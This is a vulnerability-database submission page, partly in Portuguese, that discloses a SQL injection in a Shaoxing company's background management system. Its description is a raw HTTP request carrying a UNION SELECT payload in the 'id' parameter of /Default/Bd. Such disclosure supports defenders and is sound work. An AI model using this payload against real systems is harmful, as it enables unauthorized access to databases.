Submeter #54213: SQL injection exists in the background management system Default of Shaoxing Punctuation Electronic Technology Co., LTDinformação

TítuloSQL injection exists in the background management system Default of Shaoxing Punctuation Electronic Technology Co., LTD
DescriçãoGET /Default/Bd?id=-e7fa628182201505181659430599563%27union%20select%201,2,3,4,5,6,7%20--+ HTTP/1.1 Host: TARGET:PORT User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Cookie: ASP.NET_SessionId=pjcyha1p55kts5fkgesrgehn Upgrade-Insecure-Requests: 1
Fonte⚠️ https://github.com/Peanut886/Vulnerability/blob/main/SQL%20injection%20exists%20in%20the%20background%20management%20system%20Default%20of%20Shaoxing%20Punctuation%20Electronic%20Technology%20Co.%2C%20LTD.md
Utilizador
 Peanut (UID 33478)
Submissão02/12/2022 03h26 (há 3 anos)
Moderação03/12/2022 17h13 (2 days later)
EstadoAceite
Entrada VulDB214774 [Shaoxing Background Management System /Default/Bd ID Injeção SQL]
Pontos20

Do you want to use VulDB in your project?

Use the official API to access entries easily!